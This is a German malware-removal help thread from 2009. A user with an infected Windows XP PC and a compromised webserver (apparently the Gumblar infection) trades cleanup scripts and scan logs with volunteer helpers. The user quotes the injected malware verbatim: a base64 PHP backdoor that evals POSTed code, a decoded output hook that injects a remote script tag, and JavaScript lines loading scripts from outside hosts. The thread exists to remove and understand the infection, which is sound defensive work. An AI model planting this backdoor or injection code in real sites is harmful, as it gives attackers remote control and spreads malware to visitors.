Trojaner-Board - TR/Daonol.AA

Trojaner-Board (https://www.trojaner-board.de/)

- Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)

- - TR/Daonol.AA (https://www.trojaner-board.de/79635-tr-daonol-aa.html)

moin,

bin gerade auf euer board gestoßen..

habe mir etwas eingefangen, und bekomm´s net weg

mein sys:
-winxp, sygate, antivir

ich beschreib mal kurz:
-firewall lässt sich nicht starten
-wmp classic funzt auch nicht
-bei jeder 5ten oder 10ten googlesuche schmeißt er mich auf falsche seiten (zumbeispiel auf diese "http://popencoc.com/in.cgi?4&parameter=icq&ur=1&HTTP_REFERER=31201" wenn ich nach ICQ suche)
-icq und andere programme stürzen öfter ab

bisher erfolglos:
-autoruns.exe zeigt mir nix komisches an
-registry auch manuel durchsucht aber keine passenden einträge gefunden
-alle plugins vom browser überprüft
-autostart dateien und ordner(system.ini, etc) überprüft

erfolgreich:
-mit ad-aware habe ich gefährliche Cookies und einen Trojaner gelöscht, der Übeltäter nannte sich "TR/Daonol.AA"

derzeitiger Status:
-ik dachte der wäre weg, aber wenn ich mein browser starte, verhindert ad-aware das meine registry verändert wird, und danach springt antivir an und meldet mir eine Datei im c:\Programme -Ordner.. die danach sofort wieder verschwindet..
-ich nehme mal an, das der wurm sich in meiner registry drin stehen hat, das bei jedem browserstart der wurm sich wieder neu saugt... evtl tarnt er sich auch als ein signiertes plugin, was ich so nicht erkenne...

meine frage.. kennt einer den wurm, was macht er und wo schreibt er sich überall fest

thnx im voraus:D

Zitat:

Malwarebytes' Anti-Malware 1.41
Datenbank Version: 3213
Windows 5.1.2600 Service Pack 2

22.11.2009 17:20:37
mbam-log-2009-11-22 (17-20-37).txt

Scan-Methode: Vollständiger Scan (C:\|)
Durchsuchte Objekte: 232796
Laufzeit: 27 minute(s), 24 second(s)

Infizierte Speicherprozesse: 0
Infizierte Speichermodule: 0
Infizierte Registrierungsschlüssel: 0
Infizierte Registrierungswerte: 0
Infizierte Dateiobjekte der Registrierung: 0
Infizierte Verzeichnisse: 0
Infizierte Dateien: 0

Infizierte Speicherprozesse:
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule:
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel:
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungswerte:
(Keine bösartigen Objekte gefunden)

Infizierte Dateiobjekte der Registrierung:
(Keine bösartigen Objekte gefunden)

Infizierte Verzeichnisse:
(Keine bösartigen Objekte gefunden)

Infizierte Dateien:
(Keine bösartigen Objekte gefunden)

wie gesagt, keiner findet was, allerdings taucht das teil immer wieder auf...

das ding nimmt anscheinend größere ausmaße... mein ganzer webserver is befallen

in jeder html und php-file sind neue code-zeilen

Code:

<?php  eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'

darüber hab ich mir das teil warscheinlich eingefangen...

Zitat:

190.54.62.68 - - [22/Nov/2009:12:15:26 +0100] "POST /images/gifimg.php HTTP/1.0" 200 328 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:28 +0100] "POST /images/kyg/banner_small.php HTTP/1.0" 200 296 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:29 +0100] "POST /images/gifimg.php HTTP/1.0" 200 328 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:30 +0100] "POST /images/kyg/banner_small.php HTTP/1.0" 200 296 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:32 +0100] "POST /images/gifimg.php HTTP/1.0" 200 320 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:33 +0100] "POST /images/kyg/logo.php HTTP/1.0" 200 296 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:34 +0100] "POST /images/gifimg.php HTTP/1.0" 200 328 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:35 +0100] "POST /images/kyg/banner_small.php HTTP/1.0" 200 296 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:36 +0100] "POST /images/gifimg.php HTTP/1.0" 200 328 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:38 +0100] "POST /images/kyg/banner_small.php HTTP/1.0" 200 296 "-" "-"

der sack hat sich anscheinend reingehackt und sein wurm verbreitet
oder läuft bei meinem provider der wurm auf den servern?

evtl bin ik ja jetz schon sauber, und hol mir das immer wieder durch mein webserver rein...

hallo, kennt einer den wurm?

was schreibt der in die registry?

wurde der wurm vom hacker auf meinem webserver platziert?

keiner n plan, oder will mir keiner helfen?

gebt ma feedback, dann lösch ik mich hier wieder

Hallöle.

Das du gereizt bist kann man verstehen. Wir machen uns die Arbeit hier aber ehrenamtlich und haben daher wenig Lust auf dumme Anmachen.
Zügel deine schlechte Laune daher bitte ein wenig.

Den Webserver solltest du natürlich vom Netz nehmen und neuaufsetzen.

Poste bitte zwei AVZ logs wie in der Anleitung beschrieben.

war ja kene anmache und bin ja och nich gereizt, wollt nur ne info, warum allen nur mir nich geantwortet wird ;) ejal/wayne

mein webserver ist leider nur n gemieteter, bzw ich hab da nur n paar ordner... den betreiber hab ik schon informiert, aber auch noch keine rückmeldung erhalten..
neuaufsetzen is nich jut, da meine backups nich aktuell sind, mir bleibt wohl nix anderes übrig und alle dateien/scripte runterzuladen und mitn andern script nach den eintragungen suchen und rausnehmen lassen...

dad mit avz werd ik glei ma machen

hier sind die logs, ik hab schonma als dank zweima auf die googlewerbung geklickt :rolleyes:

Führe bitte folgendes Skript aus:

Code:

begin

SearchRootkit(true, true);

SetAVZGuardStatus(True);

 DeleteFile('C:\PROGRA~1\INTERN~1\..\lohe.old 0yAAAAAAAA');

 DelBHO('AutorunsDisabled');

 DelBHO('710EB7A1-45ED-11D0-924A-0020AFC7AC4D');

 QuarantineFile('C:\WINDOWS\system32\x264vfw.dll');

 QuarantineFile('C:\WINDOWS\Installer\{90170407-6000-11D3-8CFE-0150048383C9}\misc.exe');

 QuarantineFile('spse.sys');

 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows NT\CurrentVersion\Drivers32','midi9');

BC_ImportALL;

ExecuteSysClean;

ExecuteWizard('TSW', 3, 3, true); 

BC_Activate;

RebootWindows(true);

end.

Nach dem Neustarte führ bitte folgendes Skript aus:

Code:

begin

CreateQurantineArchive('C:\quarantine.zip');

end.

Die C:\quarantine.zip lade bitte bei file-upload.net hoch und poste uns den downloadlink.

"windows Scripting Host" ist bei mir deaktiviert/deinstalliert, gibts eine andere möglichkeit?

vom webspace-anbieter hab ich die info bekommen, das nur ich betroffen bin. ich soll/werde n backup ziehen, bereinigen und neu aufspielen.. is nur übel bei ca 15 subdomains und lauter unterwebs(blogs,foren,etc)... es sind wirklich alle html,php und js-files betroffen..

das komische, es hat sich bisher keiner weiter eingelogt, und es sind bereits gesäuberte dateien wieder verseucht...

Zitat:

aus meinem Forum:

habe in php-seiten das stehen:

<? php eval base64_decode(xxxxx)

und in html-seiten steht immer n script von irgendwelchen webseiten....

und in jeden image-ordner eine:

gifimg.php

in der steht zbsp auch

Code:

<?php  eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?>

is ne 64bit-verschl., übersetzt(encoded) kommt das raus

Code:

if(isset($_POST['e']))eval(base64_decode($_POST['e']));else die('404 Not Found');

die config hat das drin:

Code:

aWYoIWZ1bmN0aW9uX2V4aXN0cygnaHdjbjInKSl7ZnVuY3Rpb24gaHdjbjIoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMnR1Wldsd2NDMWxiV1JsYmk1a1pTOXRiMjVoZEM5cmFYUmhMbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gaHdjbjIyKCRhLCRiLCRjLCRkKXtnbG9iYWwkaHdjbjIxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRod2NuMjEpKWNhbGxfdXNlcl9mdW5jKCRod2NuMjEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSlhcyR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2h3Y24yJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnaHdjbjInKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kaHdjbjJsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCdod2NuMjInKSkhPSdod2NuMjInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw

und übersetzt:

Code:

if(!function_exists('hwcn2')){function hwcn2($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2tuZWlwcC1lbWRlbi5kZS9tb25hdC9raXRhLnBocCA+PC9zY3JpcHQ+'),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function hwcn22($a,$b,$c,$d){global$hwcn21;$s=array();if(function_exists($hwcn21))call_user_func($hwcn21,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='hwcn2')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('hwcn2');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$hwcn2l=(($a=@set_error_handler('hwcn22'))!='hwcn22')?$a:0;eval(base64_decode($_POST['e']));

außerdem steht in jeder js-file:

Code:

document.write('<script src=http://premiumoriginalprints.com/libraries/CREDITS.php ><\/script>');

document.write('<script src=http://premiumoriginalprints.com/libraries/CREDITS.php ><\/script>');

document.write('<script src=http://premiumoriginalprints.com/libraries/CREDITS.php ><\/script>');

document.write('<script src=http://premiumoriginalprints.com/libraries/CREDITS.php ><\/script>');

document.write('<script src=http://premiumoriginalprints.com/libraries/CREDITS.php ><\/script>');

document.write('<script src=http://premiumoriginalprints.com/libraries/CREDITS.php ><\/script>');

document.write('<script src=http://premiumoriginalprints.com/libraries/CREDITS.php ><\/script>');

document.write('<script src=http://m1design.ho.ua/images/gifimg.php ><\/script>');

document.write('<script src=http://kneipp-emden.de/monat/kita.php ><\/script>');

document.write('<script src=http://kneipp-emden.de/monat/kita.php ><\/script>');

document.write('<script src=http://kneipp-emden.de/monat/kita.php ><\/script>');

document.write('<script src=http://kneipp-emden.de/monat/kita.php ><\/script>');

dazu hab ich das gefunden
http://www.samuidevelopment.com/2009...itet-sich-aus/

hier nochma die google-meldung, scheinen mehr seiten zu betreffen
http://www.google.com/safebrowsing/d...reme.de/&hl=de

Du sollst das Skript mit AVZ ausführen. Oder geht das ohne den Skript Host nicht. Wenn nicht dann musst du ihn wieder aktivieren. Warum ist der deaktiviert??

deaktiviert, damit keine scripte nebenbei bei mir ausgeführt werden können, da ich dies nicht benötige und einige störenfriede so nicht aktiv werden können.. ach mit avz, jo das mach ich gleich mal ^^

die 111111.com lässt sich nicht mehr starten, beim öffnen passiert nix, nichtmal ein task wird angezeigt, ich mach feierabend für heute.. bis morgen

€dit:achso,ich kanns mir auch nicht neu saugen ->http501/505

Und, heute besser mit AVZ?

es lässt sich nicht mehr starten... ich versuchs nochma neu zu saugen...

das teil was ich mir und meinem server eingefangen hab nennt sich wohl "Gumblar"

€dit: bekomme immer 501/505 error, kanns net mehr saugen und nicht starten...

AVZ lässt sich nicht mehr starten oder downloaden, und "Malwarebytes' Anti-Malware" schließt sich nach 1sek automatisch... ad-aware und antivir laufen aber ohne probleme....

ich hab mein server bereinigt, wenn ich den hier noch drauf hab, war das alles um sonst, wa? :(

sry für die doppelposts, aber ich kann nicht mehr den beitrag editieren...

ich wollte gerade mcafee saugen, komme aber nichtmal auf die homepage...

ich habe mal ne txt-datei von "autoruns" mit angehangen, evtl findet ihr ja was, was ich im abgesicherten rauskannten kann..

ich will mein sys nicht neu machen :balla:

Saug dir AVZ über einen anderen Rechner und führe das Skript aus.

ich kann kein avz starten, auch nicht im abgesichertem ;.(

ich hab übern zweiten pc grad den mcafee stinger gesaugt und durchsucht gerade, aber glaube der is fürn a****, aber den kann ich wenigstens starten.. das geile:antivir läuft ohne zu meckern,tzz..

Mach bitte jetzt nicht einfach irgendetwas sondern nur das was wir dir sagen.
Ansonsten geht das alles schief.

Antivirus Live-CD

Drucke dir diese Anleitung aus da sie dir während du mit der Live-CD arbeitest nicht zur Verfügung steht!

1. Brennen und Starten der LiveCD:

Downloade dir dieses Archiv:

Code:

http://qshare.com/get/866107/MultiAVBootCD.zip.html
Entpacke die Datei in einen eigenen Ordner. Das Passwort lautet: LiveCD2009
Brenne die entpackte .iso Datei mit einem Brennprogramm deiner Wahl. Kostenlos und gut ist zum Beispiel der CdBurnerXP
Lege die Cd ins Laufwerk ein und starte den Rechner neu. Er sollte nun von der CD booten und einen Auswahlbildschirm auf Italienisch anzeigen. Wenn der Rechner nicht von der CD bootet sondern ganz normal Windows startet musst du im BIOS den boot device ändern.(Google Hilft ;) )

2. Datensicherung:

Wähle im Auswahlbildschirm die zweite Option (Menu antivirus) aus.
Im folgenden Auswahlbildschirm wähle den zweiten Eintrag (Avvio die GDATA) aus.
Das G-Data Rettungssystem startet nun.
Du wirst automatisch gefragt ob die Virus Signatures aktuallisiert werden sollen bestätige erst durch drücken des Si Buttons und danach mit Ok.
Warte bis das Update beendet ist (100%) und schließe das Fenster durch Klicken des Chiudi Buttons.
Danach kannst du das G-Data AntiVirus Fenster erstmal schließen.
Öffne den File Manager (Gestione file) durch drücken des Akten Zeichens in der Taskleiste.
Navigiere zu deinen Festplatten. Diese finden sich im Menü auf der Linken Seite unter Filesystem -> mnt
Stecke deinen USB-Stick oder deine externe Festplatte in einen freien USB-Slot.
Öffne den File Manager ein zweites mal und navigiere zu deinen USB-Stick. Dieser findet sich als letzter Eintrag im Menü des File Managers auf der Linken Seite.
Nun hast du zwei Fenster geöffnet zwischen denen du per Drag&Drop bzw. Copy&Paste Daten verschieben kannst.
Sichere deine wichtigen Dokumente. Allerdings so musst du dies nach strengen Kriterien tun:

a) Die Datei darf nicht ausführbar sein. Das heisst sie darf keine der hier aufgeführte Dateiendung haben.
b) Jede Datei sollte, bevor sie wieder auf den frischen Rechner gelangt mit MWAV durchsucht werden.
c) Auch wenn du die Punkte a) und b) ganz genau einhältst sind die Dateien nicht vertrauenswürdig!!
Schädlinge können auch nicht-ausführbare Dateien wie .mp3 .doc usw. infizieren!! Und MWAV sowie andere AV-Scanner findet nur einen Bruchteil aller infizierten Dateien!

3. Schädlingssuche:

Viele Rootkits verändern beim Windows Start ihren Namen. Daher ist es wichtig, dass während der folgenden Prozedur der Rechner nie das normale Windows Betriebssystem startet sondern immer von der LiveCD bootet. Solltest du mal nicht schnell genug die CD ins Laufwerk bekommen oder das BootMenü verpassen so drücke den Reset Knopf am Computer um zu verhindern, dass Windows gestartet wird.

G-DATA:

Starte nun die Schädlingssuche.
Anfallende Log/Bericht Dateien speichere unbedingt!!
Schreibe dir außerdem die Funde ab!!
Nachdem G-Data durch ist starte den Rechner neu.

F-Secure:

Boote wieder von der CD und mache mit F-Secure weiter (Avvio di F-Secure).
F-Secure updatet sich von alleine. Klicke dich durch die Dialoge und starte den Scan.
Log/Bericht Dateien auf jeden Fall speichern und Funde abschreiben!!
Nachdem der Scan beendet ist starte den Rechner neu.

DrWeb:

Boote wieder von der CD und wähle (Avvio di DrWeb) aus.
Danach wähle den ersten Eintrag DrWeb-LiveCD aus.
Klicke im Hauptfenster unbedingt den grünen Button (Update Bases)!
Danach starte den Scan durch drücken des Start Buttons.
Log/Bericht Dateien auf jeden Fall speichern und Funde abschreiben!!
Nachdem der Scan beendet ist starte den Rechner neu.

Kaspersky:

Boote wieder von der CD und wähle (Avvio di kaspersky) aus.
Danach wähle den ersten Eintrag rescue aus.
Kasperksy09 startet. Das Update sollte automatisch starten. Wechsel in den Update Reiter und stelle sicher, dass das Update durchgeführt wird. Startet das Update nicht so starte es bitte manuell. Warte bis das Update beendet wurde und die Siganturen aktuell sind.
Setze unter Settings -> Scan: den Haken bei All Archives.
Wähle unter Settings -> Threads and Exclusions -> Settings: alle Bedrohungen aus. Einen Haken musst du selber für "other Programms" setzen.
Wähle dann im Hauptfenster alle deine Festplatten sowie die Laufwerksbootsektoren aus (einfach alles auswählen!) und starte den Scan.
Ist der Scan beendet rufe das log auf und speichere es.
Schreibe dir außerdem wie immer alle Funde auf ein Blatt Papier ab!!

Alle Log/Bericht Dateien sowie die abgeschriebenen Funde packe bitte per G-Data Rettungssystem wie oben beschrieben auf einen USB-Stick und poste sie uns. Dazu musst du einen anderen PC benutzen da du den infizierten Rechner wie gesagt nur über die Live CD booten darfst bis du von uns andere Anweisungen bekommst.
Solltest du keinen anderen PC zur Verfügung haben bietet das DrWeb Live System einen integrierten FireFox an. Du kannst also von der DrWeb-LiveCD booten, FireFox aufrufen, das Trojaner-Board besuchen und uns die Funde posten.

Leider is mein Brenner ****zensur**** .. ähm .. breit/defekt

Ich habe noch einen 2gb-USB-Stick/mp3-player oder die Möglichkeit meine Platte an ein anderen PC zu hängen und durchsuchen zu lassen, allerdings wird der nicht die Registry durchgehen..

oder kann ich das tool schnell auf ne neue partition machen und n bootmenu vorschalten? hab genug frei für n paar partitionen ^^

Du kannst das auch auf eine Neue Partition packen und ein Boot Menü davor schalten. Sollte kein Problem sein.

ok, letzte Partition angepasst, neue Partition erstellt, Iso entpackt, Bootmenu geschaltet, und wie bekomm ich die Partition jetz bootfähig? =P

€dit: Hier hat sich gerade Antivir seit langem gemeldet -> TR/Crypt.XPACK.Gen

Du wirst wohl irgendwie einen Brenner auftreiben können oder?

hmpf, nein.. wozu habe ich denn nach einer anderen möglichkeit gefragt und jetzt extra die partition angelegt... was ist das denn fürn system ? sonst boote ich n xp/linux und greife dann auf die partition zu...

hijack und sowas alles, lässt sich auch nicht öffnen

Du brauchst die Boot CD.

omg, ich denke es ist möglich, und ich kann das machen... naja wayne, selbst is der mann ;) ich hab jetzt erstmal ein neuen benutzer angelegt und unter dieser anmeldung kann ich alle progz starten..

Möglich ist alles. Alerdings musst du dir das selber beibringen. ;) Jetzt noch an einer Bootfähigen Partition rumbasteln ist mir zu aufwändig.

Dafür gibt es CDs. ;)

hm, dachte ihr kennt euch da aus, ik hab kein plan von linux bzw is ja knopix.. ich lass gerade mit avz auf ner anderen benutzerebene mein sys durchscannen und werd glei ma hijackthis ausführen.. zeigt hjt nur den aktiven benutzer an ?

Du sollst die Boot CD benutzen. -.-

soll ich die in den pci-slot oder zwischen die cpu-kühlerrippen schieben ? :/

=) Das kannst du mal ausprobieren. Lass mich wissen ob es geklappt hat. Würde mich interessieren.

Mit der Bootfähigen Partition geht das sicher aber da müsste ich jetztt selber google bemühen und das kannst du auch alleine machen. ;)

So ein CD Brenner/Laufwerk kostet vlt. noch 30€. ;)

PS: Ich kanns doch nicht ändern.

ich habe eben beim screen "Windows wird geladen" esc gedrückt.. und auf einma kann ich hijack starten.. dafür ist der andere benutzer jetzt auch verseucht

hier meine hjt-log

Zitat:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 14:07:16, on 25.11.2009
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.5730.0013)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\svchost.exe
C:\Programme\Sygate\SPF\smc.exe
C:\WINDOWS\system32\svchost.exe
C:\Programme\Alwil Software\Avast4\aswUpdSv.exe
C:\Programme\Lavasoft\Ad-Aware\AAWService.exe
C:\Programme\Alwil Software\Avast4\ashServ.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\RUNDLL32.EXE
C:\Programme\Avira\AntiVir Desktop\avgnt.exe
C:\Programme\NVIDIA Corporation\NvMixer\NVMixerTray.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\Programme\DAEMON Tools Lite\DTLite.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programme\Avira\AntiVir Desktop\sched.exe
C:\Programme\Avira\AntiVir Desktop\avguard.exe
C:\Programme\Gemeinsame Dateien\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Programme\Alwil Software\Avast4\ashMaiSv.exe
C:\Programme\Alwil Software\Avast4\ashWebSv.exe
C:\Programme\Lavasoft\Ad-Aware\AAWTray.exe
C:\Programme\Alwil Software\Avast4\setup\avast.setup
C:\Programme\Trend Micro\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = Google
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = Nachrichten - Service - Shopping bei t-online.de
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = Bing
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = Bing
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = Nachrichten - Service - Shopping bei t-online.de
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Windows Internet Explorer bereitgestellt von T-Online
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = 142.150.238.13:3124
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local;<local>
O2 - BHO: (no name) - AutorunsDisabled - (no file)
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Programme\Gemeinsame Dateien\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Adobe PDF Conversion Toolbar Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Programme\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Programme\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll
O4 - HKLM\..\Run: [nwiz] C:\Programme\NVIDIA Corporation\nView\nwiz.exe /install
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [avgnt] "C:\Programme\Avira\AntiVir Desktop\avgnt.exe" /min
O4 - HKLM\..\Run: [NVMixerTray] "C:\Programme\NVIDIA Corporation\NvMixer\NVMixerTray.exe"
O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\SPF\smc.exe -startgui
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Programme\DAEMON Tools Lite\DTLite.exe" -autorun
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\RunOnce: [WiseStubReboot] MSIEXEC /quiet SKIP_PPU_DRIVER_INSTALL=1 /I "C:\Programme\Gemeinsame Dateien\Wise Installation Wizard\WISC5C1C0F0D62F4DBF81D4D7EF397C228B_9_09_0814.MSI" TRANSFORMS="C:\Programme\Gemeinsame Dateien\Wise Installation Wizard\WISC5C1C0F0D62F4DBF81D4D7EF397C228B_9_09_0814.MST" WISE_SETUP_EXE_PATH="c:\nvidia\displaydriver\190.62\international\PhysX_9.09.0814_SystemSoftware.exe"
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOKALER DIENST')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETZWERKDIENST')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\RunOnce: [BrStsWnd.exe] C:\Programme\Brownie\BrStsWnd.exe WindowsStartUpModel (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - HKUS\.DEFAULT\..\RunOnce: [BrStsWnd.exe] C:\Programme\Brownie\BrStsWnd.exe WindowsStartUpModel (User 'Default user')
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O8 - Extra context menu item: An vorhandenes PDF anfügen - res://C:\Programme\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Ausgewählte Verknüpfungen in Adobe PDF konvertieren - res://C:\Programme\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
O8 - Extra context menu item: Ausgewählte Verknüpfungen in vorhandene PDF-Datei konvertieren - res://C:\Programme\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
O8 - Extra context menu item: Auswahl in Adobe PDF konvertieren - res://C:\Programme\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Auswahl in vorhandene PDF-Datei konvertieren - res://C:\Programme\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: In Adobe PDF konvertieren - res://C:\Programme\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Verknüpfungsziel in Adobe PDF konvertieren - res://C:\Programme\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Verknüpfungsziel in vorhandene PDF-Datei konvertieren - res://C:\Programme\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O9 - Extra button: Recherchieren - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
